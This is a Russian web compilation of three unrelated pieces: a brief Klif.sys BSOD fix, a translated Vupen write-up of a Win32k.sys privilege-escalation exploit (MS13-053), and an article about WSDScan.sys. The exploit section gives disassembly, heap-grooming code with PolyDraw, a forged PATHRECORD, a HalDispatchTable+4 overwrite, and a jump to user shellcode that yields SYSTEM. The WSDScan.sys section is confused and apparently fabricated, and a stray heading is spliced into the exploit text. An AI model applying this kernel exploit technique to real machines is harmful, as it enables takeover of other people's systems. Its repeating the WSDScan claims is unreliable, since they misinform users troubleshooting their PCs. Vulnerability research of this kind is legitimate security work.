Синий экран смерти с Klif.sys вылетает иногда при загрузке или даже работе ПК на Windows 11. Что это за SYS-файл и почему он не дает мне нормально пользоваться компьютером? Простите, далек от всех этих штук, а поэтому не отказался бы от помощи.
Решение
Klif.sys — это драйвер антивирусной программы Kaspersky. Само же название файла — это сокращение от Kaspersky Lab Intruder Filter; часть антивируса, отвечающая за фильтрацию нежелающих элементов в системе пользователя.Чтобы вернуть драйвер Klif.sys в нормальное состояние, можно попробовать:переустановить антивирус Kaspersky;удалить из системы другие антивирусы, если такие имеются;обновить Kaspersky до наиболее актуальной версии;восстановить целостность системных файлов (WIN+R→CMD→CTRL+SHIFT+ENTER→SFC /SCANNOW).После вышеуказанных шагов BSoD с файлом Klif.sys должен перестать вас беспокоить.
Источник: cartridge-ali.ru
win32kfull.sys Критическая ошибка. Два решения проблемы
Расширенная эксплуатация уязвимостей «Win32k.sys»
Наверняка многие знают Vupen Security. Недавно у них в блоге была опубликована запись о эксплуатации Win32k.sys с целью повышения привилегий. Поскольку запись очень интересная и раскрывает методологию поиска уязвимости, я решил её перевести.
За последнее время Тависом Орманди (он заслуживает премии Pwnie 2013 за это!) была найдена и опубликована интересная уязвимость повышения привилегий в Windows. Позднее она была исправлена Microsoft как часть MS13-053. Уязвимость затрагивает функцию «EPATHOBJ::pprFlattenRec()» в Win32k.sys и позволяет непривилегированному пользователю получить права SYSTEM.
Хотя некоторыми исследователями были опубликованы различные исходные коды, использующие эту уявимость, нашей целью было создание надежного и универсального эксплоита работающего в Windows 8, Windows 7, Vista, и XP как в 32-х, так и 64-х разрядных системах, без побочных эффектов и зависимости состояния гонок.
1. Технический анализ уязвимости
Когда вызывается функция «FlattenPath ()», метод «win32k!EPATHOBJ::bFlatten()» переходит в режим ядра в Win32k.sys:
.text:0011602C win32k!EPATHOBJ::bFlatten .text:0011602C mov edi, edi .text:0011602E push ecx .text:0011602F mov eax, [esi+8] // заголовок списка PATHRECORD .text:00116032 test eax, eax .text:00116034 jz short loc_11605B .text:00116036 mov eax, [eax+14h] // первый указатель PATHRECORD .text:00116039 .text:00116039 loc_116039: .text:00116039 test eax, eax // достигли конца списка .text:0011603B jz short loc_116053 .text:0011603D test byte ptr [eax+8], 10h // это кривая Безье .text:00116041 jz short loc_11604F .text:00116043 push eax .text:00116044 mov ecx, esi .text:00116046 call EPATHOBJ::pprFlattenRec // Сглаживание кривых Безье .text:0011604B test eax, eax .text:0011604D jz short loc_11605B .text:0011604F .text:0011604F loc_11604F: .text:0011604F mov eax, [eax] // current = current->next .text:00116051 jmp short loc_116039 .text:00116053 loc_116053: .text:00116053 and dword ptr [esi], 0FFFFFFFEh .text:00116056 xor eax, eax .text:00116058 inc eax .text:00116059 pop ecx .text:0011605A retn
Если объект PATHRECORD содержит точки, описывающих кривые Безье, метод «win32k!EPATHOBJ::pprFlattenRec()» входит:
Easiest 2023 Guide to fix win32kfull.sys BSOD error
.text:001171E0 win32k!EPATHOBJ::pprFlattenRec . .text:00117208 lea ebx, [ebp+newPathRecord] .text:0011720E mov [ebp+var_EC], edi .text:00117214 mov [ebp+currentPathRecord], eax .text:0011721A call EPATHOBJ::newpathrec // Аллокация нового PATHRECORD
Происходит вызов «win32k EPATHOBJ::newpathrec (!)» для выделения памяти под PATHRECORD, если не хватает имеющейся:
.text:00115F87 win32k!EPATHOBJ::newpathrec . .text:00115F99 mov edx, [ecx+4] // получение последнего PATHRECORD .text:00115F9C mov eax, [ecx+8] // получение размера PATHRECORD для аллокации .text:00115F9F add edx, 10h .text:00115FA2 add eax, ecx // переход в конец массива .text:00115FA4 cmp eax, edx .text:00115FA6 jbe short loc_115FAF .text:00115FA8 sub eax, edx .text:00115FAA sar eax, 3 .text:00115FAD mov [esi], eax // вычисление оставшиеся триплетов .text:00115FAF loc_115FAF: .text:00115FAF mov eax, [esi] .text:00115FB1 cmp eax, 8 // Если осталось меньше 8 .text:00115FB4 jb short loc_115FC2 // аллокация новой структуры PATHRECORD . .text:00115FC2 loc_115FC2: . .text:00115FC7 call newpathalloc
В случае, если объекту PATHRECORD не хватает «слотов» вызывется функция «! Win32k newpathalloc ()»:
.text:00116729 win32k!newpathalloc .text:00116729 mov edi, edi .text:0011672B push ebp .text:0011672C mov ebp, esp .text:0011672E push ecx .text:0011672F push ebx .text:00116730 push esi .text:00116731 mov esi, PATHALLOC::hsemFreelist . .text:0011674C loc_11674C: .text:0011674C mov edi, PATHALLOC::freelist .text:00116752 mov ebx, 0FC0h .text:00116757 test edi, edi .text:00116759 jz short loc_11679A
«win32k!PATHALLOC::freelist» является простой связанной структурой списка, способной вмещать до 4 элементов. В случае если « win32k!PATHALLOC::freelist » список пуст, используется:
.text:00116729 win32k!newpathalloc . .text:0011679A loc_11679A: .text:0011679A push 1 .text:0011679C push ‘tapG’ .text:001167A1 push ebx .text:001167A2 call PALLOCMEM2
«win32!kPALLOCMEM2()» фактически является оболочкой над «nt!ExAllocatePoolWithTag()» с использованием «memset(0)» на только что выделенный пул чанков.
В случае, когда freelist содержит элементы, используется:
.text:00116729 win32k!newpathalloc . .text:0011675B mov eax, [edi] // получение слудующего элемента .text:0011675D dec PATHALLOC::cFree // количество элементов в freelist .text:00116763 mov PATHALLOC::freelist , eax // обновление freelist .text:00116768 .text:00116768 loc_116768: .text:00116768 and dword ptr [edi], 0 .text:0011676B lea eax, [edi+0Ch] // eax указывает на структуру PATHRECORD . .text:00115FB9 mov [ebx], eax // назначение newPathRecord указателю .text:00115FBB xor eax, eax .text:00115FBD inc eax .text:00115FBE pop ebp .text:00115FBF retn 4
Счетчик элементов freelist уменьшается, а сам список обновляется, для указания на новый элемент. Однако, на этот раз память возвращается из freelist и не устанавливается 0, таким образом, в ней все еще содержатся данные предыдущих структур PATHRECORD.
Структура PATHRECORD выглядит следующим образом:
typedef struct _PATHRECORD < struct _PATHRECORD *next; // указатель на следующий PATHRECORD struct _PATHRECORD *prev; // указатель но предыдущий PATHRECORD DWORD flags; // тип PATHRECORD DWORD numPoints; // количество точек POINT points[0]; // переменная количества элементов массива >PATHRECORD, *PPATHRECORD;
Структура POINT выглядит следующим образом (из MSDN):
typedef struct tagPOINT < LONG x; LONG y; >POINT, *PPOINT;
В конце концов, функция возвращает результат, и система начинает инициализацию вновь созданной структуры PATHRECORD:
.text:001171E0 win32k!EPATHOBJ::pprFlattenRec . .text:00117228 mov ebx, [ebp+newPathRecord] .text:0011722E mov esi, [ebp+currentPathRecord] .text:00117234 mov eax, [esi+4] // eax = currentPathRecord->prev .text:00117237 mov [ebx+4], eax // newPathRecord->prev= eax .text:0011723A lea eax, [ebx+0Ch] // eax = records[]) .text:0011723D and dword ptr [eax], 0 // records[0] = 0 .text:00117240 mov [ebp+newPathRecord], eax .text:00117246 mov eax, [esi+8] // eax = currentPathRecord->flags .text:00117249 and eax, 0FFFFFFEFh .text:0011724C mov [ebx+8], eax // newPathRecord->flags = eax
Система инициализирует все поля, кроме следующего поля PATHRECORD, которое может содержать другие данные, отличные от 0, в случае, когда запись была возвращена «win32k!PATHALLOC::freelist» связанным списком. Хотя система позже инициализирует эту область памяти, существует возможность, которая позволяет пропустить инициализацию в случае выхода из строя распределения памяти:
.text:001171E0 win32k!EPATHOBJ::pprFlattenRec . .text:001E984C call EPATHOBJ::newpathrec .text:001E9851 cmp eax, 1 .text:001E9854 jnz short loc_1E9801 // при неуспешной инициализации . .text:001E9801 xor eax, eax .text:001E9803 jmp loc_117371 . .text:00117371 loc_117371: . .text:0011737E leave .text:0011737F retn 4
Метод «win32k!EPATHOBJ::newpathrec()» возвращает 0 в случае невозможного выделения памяти. Это происходит в случае, если «win32k!PATHALLOC::freelist» пустой и «nt!ExAllocatePoolWithTag()» не может произвести аллокацию памяти.
В этом случае объект PATHRECORD имеет неправильный указатель на следующую структуру PATHRECORD.
В результате происходит второй вызов «win32k!NtGdiFlattenPath()», который вызывает нарушение прав доступа при попытке разыменования следующего указателя в «win32k!EPATHOBJ::bFlatten()»:
.text:0011602C win32k!EPATHOBJ::bFlatten .text:0011602C .text:0011602C mov edi, edi .text:0011602E push ecx .text:0011602F mov eax, [esi+8] .text:00116032 test eax, eax .text:00116034 jz short loc_11605B .text:00116036 mov eax, [eax+14h] // Разыменовывание ошибочного указателя .text:00116039 .text:00116039 loc_116039: .text:00116039 test eax, eax .text:0011603B jz short loc_116053 .text:0011603D test byte ptr [eax+8], 10h // Крах здесь!
2. Эксплуатация на Windows 8 (32bit)
2.1 Управление неинициализированным указателем
Использование этой уязвимости требует доступа к значению неинициализированного указателя. Когда вызывается «win32k!EPATHOBJ::bFlatten» должны быть соблюдены два условия:
- При первом вызове «win32k!EPATHOBJ::newpathrec()», должен быть положительный результат и возвращен управляемый объект PATHRECORD из «win32k!PATHALLOC::freelist», который будет связан с текущим списком PATHRECORD.
- Следующий вызов «win32k!EPATHOBJ::newpathrec()» должен потерпеть неудачу из-за нехватки памяти и выхода из функции «win32k!EPATHOBJ::bFlatten()», в результате чего следующий указатель станет неинициализированным.
Выполнение первого условия легко обходится с помощью следующего кода:
for (i = 0; i < 8192; i++) < points[i].x = 0x41414141 >> 4; points[i].y = 0x41414141 >> 4; pointTypes[i] = 0x10; > /* Первый вызов PolyDraw заполняет ровно одну страницу управляемыми данными */ BeginPath(hDevice); PolyDraw(hDevice, points, pointTypes, 498); EndPath(hDevice);
В конечном счёте функция «PolyDraw()» приведет к вызову «win32k!EPATHOBJ::newpathrec()», который выделит новые 0xFC0h байт, содержащие 0x041414140 х и у полей. Только что выделенный кусок имеет следующую структуру в памяти:
kd> dd ecx + 0xc 82ad0014 00000000 00000000 00000017 000001f2 82ad0024 41414140 41414140 41414140 41414140 82ad0034 41414140 41414140 41414140 41414140 82ad0044 41414140 41414140 41414140 41414140 82ad0054 41414140 41414140 41414140 41414140 82ad0064 41414140 41414140 41414140 41414140 82ad0074 41414140 41414140 41414140 41414140 82ad0084 41414140 41414140 41414140 41414140
Функция «PolyDraw()» вызывается второй раз, но с меньшим количеством точек в параметрах:
/* Из-за BeginPath() ранее выделенные данные становятся освобождеными */ BeginPath(hDevice); /* Освобожденная память перераспределяется в PolyDraw() без MemSet(), таким образом область памяти заполнена контролируемые пользователем даннми. */ PolyDraw(hDevice, points, pointTypes, 483);
Произведя это, выделенная порция памяти будет освобождена и сразу же перераспределена для списка с меньшим количеством точек. Теперь чанки выглядят следующим образом:
kd> dd ecx + 0xc 82ad0014 00000000 82ad0f44 00000017 000001e3 82ad0024 41414140 41414140 41414140 41414140 82ad0034 41414140 41414140 41414140 41414140 82ad0044 41414140 41414140 41414140 41414140 82ad0054 41414140 41414140 41414140 41414140 82ad0064 41414140 41414140 41414140 41414140 82ad0074 41414140 41414140 41414140 41414140 82ad0084 41414140 41414140 41414140 41414140 . 82ad0f44 41414140 41414140 41414140 41414140
Значение 0x82AD0F44 возвращенное «win32k!EPATHOBJ::newpathrec()» вставляется в PATHRECORD, который в свою очередь проникает в новый объект PATHRECORD связанного списка:
.text:001171E0 win32k!EPATHOBJ::pprFlattenRec . .text:00117228 mov ebx, [ebp+newPathRecord] .text:0011722E mov esi, [ebp+currentPathRecord] .text:00117234 mov eax, [esi+4] // eax = currentPathRecord->prev .text:00117237 mov [ebx+4], eax // newPathRecord->prev= eax .text:0011723A lea eax, [ebx+0Ch] // eax = records[]) .text:0011723D and dword ptr [eax], 0 // records[0] = 0 .text:00117240 mov [ebp+newPathRecord], eax .text:00117246 mov eax, [esi+8] // eax = currentPathRecord->flags .text:00117249 and eax, 0FFFFFFEFh .text:0011724C mov [ebx+8], eax // newPathRecord->flags = eax .text:0011724F cmp dword ptr [ebx+4], 0 .text:00117253 mov [ebp+var_F4], ebx .text:00117259 jz loc_117382 . .text:00117382 mov eax, [edi+8] .text:00117385 mov [eax+14h], ebx // Установка новой записи
Код будет пытаться выравнить PATHRECORD в связанном списке, и в конце концов выполнится следующий фрагмент кода:
.text:001E9841 lea ebx, [ebp+var_100] .text:001E9847 mov edi, edx .text:001E9849 mov [eax+4], ecx .text:001E984C call EPATHOBJ::newpathrec // Аллокация нового PATHRECORD .text:001E9851 cmp eax, 1 .text:001E9854 jnz short loc_1E9801 // Если выделения памяти не произошло . .text:001E9801 xor eax, eax .text:001E9803 jmp loc_117371 . .text:00117371 loc_117371: . .text:0011737E leave .text:0011737F retn 4
Так как больше нет доступной памяти, вызов «win32k!EPATHOBJ::newpathrec()» не удается. Таким образом, функция не вызывается автоматически при следующем обращении к PATHRECORD структуре, которая теперь находится под контролем атакующего.
Вопреки тому, что было публично заявилено про отсутсвие состояния гонок участвующих в этом эксплоите. Хотя PATHRECORD со следующим указателем 0x41414140 был включен в перечень PATHRECORD, ничего не произойдет, поскольку метод «win32k!EPATHOBJ::bFlatten()» не взаимодействовал с конкретным списком PATHRECORD. Перед нарушением прав доступа, память ядра освобождается для того, чтобы все последующие вызовы «win32k!newpathalloc()» увенчались успехом:
/* Начало ошибки: вставка указателя «Next» */ FlattenPath(hDevice); /* Освобождение памяти: пусть ядро работает. */ while (NumRegion) DeleteObject(Regions[—NumRegion]); /* Активация сброса недействительного указателя */ FlattenPath(hDevice);
Второй вызов «FlattenPath()» вызывает нарушение прав доступа:
.text:0011602C win32k!EPATHOBJ::bFlatten .text:0011602C .text:0011602C mov edi, edi .text:0011602E push ecx .text:0011602F mov eax, [esi+8] .text:00116032 test eax, eax .text:00116034 jz short loc_11605B .text:00116036 mov eax, [eax+14h] // Разыменование недействительного следующего указателя .text:00116039 .text:00116039 loc_116039: .text:00116039 test eax, eax .text:0011603B jz short loc_116053 .text:0011603D test byte ptr [eax+8], 10h // Крах здесь! eax == 0x41414140
2.2 Операция Write4
Теперь следующий указатель контролируется, цель будет заключаться в достижении повреждения памяти, вставив ложную запись в PATHRECORD связанного списка.
Для того, чтобы создать поддельный PATHRECORD, следующий указатель указывает на VirtuaAlloc() памяти в пространстве пользователя содержащие структуру PATHRECORD:
PathRecord = (PPATHRECORD)VirtualAlloc(NULL, sizeof *PathRecord, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); /* PATHRECORD структура. */ PathRecord->prev = 0; PathRecord->next = (PPATHRECORD) PathRecord->flags = 0; ExploitRecord.next = 0x41414141 >> 4; ExploitRecord.prev = 0x42424242 >> 4; ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH; ExploitRecord.count = 4;
Код будет обрабатывать PathRecord объекта. Поскольку значениее флаг равно 0, функция «win32k!EPATHOBJ::pprFlattenRec()» не отрабатывает. Следующий указатель разыменовывается, указывая на объект ExploitRecord. На этот раз, так как флаг установлен PD_BEZIERS (0x10), объект обрабатывается «win32k!EPATHOBJ::pprFlattenRec()»:
.text:0011602C mov edi, edi .text:0011602E push ecx .text:0011602F mov eax, [esi+8] .text:00116032 test eax, eax .text:00116034 jz short loc_11605B .text:00116036 mov eax, [eax+14h] // Получение начала списка .text:00116039 .text:00116039 loc_116039: .text:00116039 test eax, eax .text:0011603B jz short loc_116053 .text:0011603D test byte ptr [eax+8], 10h // PATHRECORD кривые Безье .text:00116041 jz short loc_11604F .text:00116043 push eax .text:00116044 mov ecx, esi .text:00116046 call EPATHOBJ::pprFlattenRec .text:0011604B test eax, eax .text:0011604D jz short loc_11605B .text:0011604F .text:0011604F loc_11604F: .text:0011604F mov eax, [eax] // переход к следующему PATHRECORD .text:00116051 jmp short loc_116039
«win32k!EPATHOBJ::pprFlattenRec()» взаимодействует с созданным PATHRECORD объектом:
.text:00117202 lea esi, [ebp+var_F8] .text:00117208 lea ebx, [ebp+newPathRecord] .text:0011720E mov [ebp+var_EC], edi .text:00117214 mov [ebp+currentPathRecord], eax .text:0011721A call EPATHOBJ::newpathrec // успешно, так как .text:0011721F cmp eax, 1 // был возврат ядру .text:00117222 jnz loc_1E9801 .text:00117228 mov ebx, [ebp+newPathRecord] // Адрес записи в ebx .text:0011722E mov esi, [ebp+currentPathRecord] .text:00117234 mov eax, [esi+4] .text:00117237 mov [ebx+4], eax // установка следующего указателя .text:0011723A lea eax, [ebx+0Ch] .text:0011723D and dword ptr [eax], 0 .text:00117240 mov [ebp+newPathRecord], eax .text:00117246 mov eax, [esi+8] .text:00117249 and eax, 0FFFFFFEFh .text:0011724C mov [ebx+8], eax .text:0011724F cmp dword ptr [ebx+4], 0 .text:00117253 mov [ebp+var_F4], ebx .text:00117259 jz loc_117382 .text:0011725F mov eax, [ebx+4] .text:00117262 mov [eax], ebx // повреждение памяти
Поскольку уязвимость позволяет контролировать, какие данные будут скопированы, подходы у каждой архитектуры свои. В этом блоге, мы остановимся на 32-битном подходе.
2.3 Завершение эксплуатации
На x86, указатель находится в nt!HalDispatchTable+0x4. После коррупции произошел вызов «NtQueryIntervalProfile», который вызовет перезаписсь указателя и перенаправление потока исполнения:
PAGE:007631D1 nt!KeQueryIntervalProfile PAGE:007631D1 PAGE:007631D1 mov edi, edi PAGE:007631D3 push ebp PAGE:007631D4 mov ebp, esp PAGE:007631D6 sub esp, 14h PAGE:007631D9 cmp eax, 1 PAGE:007631DC jz short loc_763202 PAGE:007631DE mov [ebp+var_14], eax PAGE:007631E1 lea eax, [ebp+var_4] PAGE:007631E4 push eax PAGE:007631E5 lea eax, [ebp+var_14] PAGE:007631E8 push eax PAGE:007631E9 push 10h PAGE:007631EB push 1 PAGE:007631ED call off_5CCF2C // xHalQuerySystemInformation
Затем ядро продолжит исполнение, чтобы перейти на PATHRECORD. Так как, в x86, страницы, выделенные через «win32k!Newpathalloc()» являются исполняемыми и данные ядра расположены в PATHRECORD, успешно произойдет переход на значение указателя следующего PATHRECORD .
Поскольку созданный PATHRECORD является последним в списке PATHRECORD и следующий указатель равен NULL произойдет крах ядра.
Нужно выработать такой алгоритм PATHRECORD что PATHRECORD используется для перезаписи nt!HalDispatchTable+4 указателем не последний элемент из цепи. Следующий указатель должен указывать на PATHRECORD, который должен быть расположен по такому адресу, который является действительной последовательностью x86 кода операции.
Тависом был найден хороший кандидат последовательности:
inc eax jmp [ebp + 0x40h]
Это перевод в DWORD 0x40FF6540 который может быть отображен в пространстве пользователя. Этот адрес должен содержать корректный PATHRECORD которым заканчивается цепь.
[EBP + 0x40h] фактически располагает в стеке второй аргумент NtQueryIntervalProfile, который является указателем на шеллкод в пространстве пользователя, что приводит к выполнению кода с системными привилегиями вплоть до Windows 8.
Подобная операция может быть применена также на 64-битных системах, несмотря на все препятствия для эксплойта в том числе SMEP (Supervisor Mode Execution Protection), тем не менее, мы оставляем это в качестве тренировки для читателя, чтобы предотвратить утечку уязвимостей, которые могут быть использованы в Google Chrome или Adobe Acrobat / Reader.
Источник: stackoff.ru
Что такое WSDScan.sys? Вирус или вредоносное ПО и удаление
На вашем компьютере вы можете обнаружить, что файл с именем WSDScan.sys продолжает появляться в диспетчере задач. Это может быть довольно раздражающим, потому что этот файл может замедлить работу вашего компьютера, используя 100% процессорного времени и ресурсов памяти, замедляя скорость вашей системы до минимума. В этой статье мы рассмотрим, что такое WSDScan.sys, почему он замедляет работу вашего компьютера и как его удалить и предотвратить его повторение в будущем.
Что такое WSDScan.sys?
WSDScan.sys — это Windows файл безопасности, который используется для идентификации вредоносных файлов, запущенных на вашем компьютере. Доступ к этому сканированию можно получить, нажав клавишу с логотипом Windows + R, введя MSConfig в диалоговом окне запуска, щелкнув вкладку «Автозагрузка» в утилите настройки системы, установив флажок рядом с «Безопасность Windows», а затем нажав «ОК». Он предоставит вам информацию о выбранном вами процессе (WSDScan.sys).
Является ли WSDScan.sys вирусом или вредоносным ПО?
WSDScan.sys не является вирусом или вредоносным ПО, но может вызвать некоторые проблемы с вашим компьютером, если вы не знаете, что это такое и как его удалить. Файл, который, по некоторым данным, существует по крайней мере с 2001 года, отслеживает системный каталог Windows на предмет изменений в содержимом файлов, которые имеют решающее значение для стабильности системы.
При обнаружении изменения в журнал событий Windows будет отправлено предупреждающее сообщение для устранения неполадок. Важно отметить, что хотя это законная функция, она также может создавать проблемы при использовании определенных программ или установке определенных драйверов.
И, к сожалению, многие люди узнали об этом слишком поздно, потому что они не знали об этом файле и о том, что он делает, пока они не попытались удалить одну программу за другой безуспешно, пока, наконец, не наткнулись на ответ: их проблема была вызвана WSDScan.sys! Иногда лучше всего просто оставить его в покое, хотя есть способы отключить его, например, запустить services.MSC и найти Наблюдатель системных каталогов Windows.
Просто щелкните его правой кнопкой мыши и выберите «Свойства», а затем нажмите «Тип запуска», где вы увидите два варианта: «Отключено» или «Автоматически (с задержкой)». Выбор Disabled остановит автоматический запуск службы, а выбор Automatic (с задержкой) означает, что она не будет запускаться снова до следующей загрузки.
Вы захотите перезагрузить компьютер, прежде чем пытаться что-либо еще, чтобы WSDScan.sys не мешал другим процессам, если вы решите его отключить; в противном случае выбор Disabled может вступить в силу раньше, чем позже. Помните, что вы должны использовать эти методы только в крайнем случае, так как отключение или удаление этого процесса может принести больше вреда, чем пользы. Но, к счастью, в Интернете доступно множество простых исправлений, если все, что вам нужно, — это несколько указателей, чтобы самостоятельно исправить любые надоедливые ошибки WSDScan.sys и вернуться к обычным делам.
Как удалить WSDScan.sys
- Найдите процессы с такими именами, как WSD Scan, и завершите их.
- Очистить корзину/удалить файлы, связанные со сканированием WSD
- Используйте антивирусное программное обеспечение для поиска вирусов (у AVG есть бесплатная версия)
- При необходимости обновите операционную систему 9. При необходимости перезагрузите устройства, а также удалите все файлы, оставшиеся в пустой корзине или папках. После завершения подтвердите, есть ли проблема с вашим компьютером.
Как защитить свой компьютер от вирусов и вредоносных программ
Чтобы защитить компьютер от вирусов, вредоносных программ и других угроз безопасности, важно установить на устройство антивирусное программное обеспечение. В Интернете доступно несколько бесплатных опций, которые вы можете использовать для защиты своих устройств.
Своевременное обновление антивирусного программного обеспечения гарантирует, что оно сможет обнаруживать новые угрозы, чтобы обеспечить вашу безопасность в Интернете. Лучший способ узнать, скомпрометировано ли ваше антивирусное программное обеспечение, — проверить наличие обновлений на веб-сайте компании.
Если есть доступные обновления, скачайте их и сразу же установите. Если в последнее время не было обновлений, обязательно обновляйте свое программное обеспечение не реже одного раза в месяц. Также рекомендуется время от времени проверять веб-сайт компании, чтобы узнать, выпустили ли они обновление с момента последней проверки.
Также рекомендуется перед обновлением сделать резервную копию ваших данных на случай, если во время установки что-то пойдет не так. После установки всегда запускайте антивирусную проверку с помощью предпочтительного антивирусного программного обеспечения как можно скорее.
Будьте в курсе того, сколько данных вы загружаете, загружаете или отправляете по электронной почте и каналам социальных сетей. Совершая покупки в Интернете, избегайте переходов по ссылкам в электронных письмах, которые кажутся подозрительными.
Кроме того, будьте осторожны с информацией, которую вы предоставляете при регистрации учетных записей в Интернете — по возможности избегайте предоставления личной информации и не предоставляйте конфиденциальную информацию, такую как номера банковских счетов или номеров кредитных карт, не прочитав предварительно отзывы о сайте. И, наконец, сообщайте обо всем подозрительном!
Как я могу обнаружить вирус на моем компьютере?
- Используйте новейшее антивирусное программное обеспечение, такое как Microsoft Security Essentials или Avast! Антивирус. Установите последние обновления как для операционной системы (Windows), так и для браузеров (Internet Explorer, Firefox). Если вы используете более старую версию Windows (XP или Vista), установите пакет обновлений 3 и Internet Explorer 8. Если вы используете Windows 7, установите все доступные обновления.
- Установите стороннее программное обеспечение безопасности, такое как Norton AntiVirus 2012 или Spybot Search Руткиты и трояны.
Заключение
На этом мы завершаем то, что нам известно о файле WSDScan.sys, вирусе или вредоносном ПО, и о том, как его удалить, если он был обнаружен в вашей компьютерной системе.
Если у вас есть какие-либо вопросы по этому поводу, задайте их в разделе комментариев ниже, и мы сделаем все возможное, чтобы помочь вам!
опубликовано Опубликовано: ноябрь 16, 2022 — Последнее обновление: 8 августа 2023
Источник: www.techyloud.com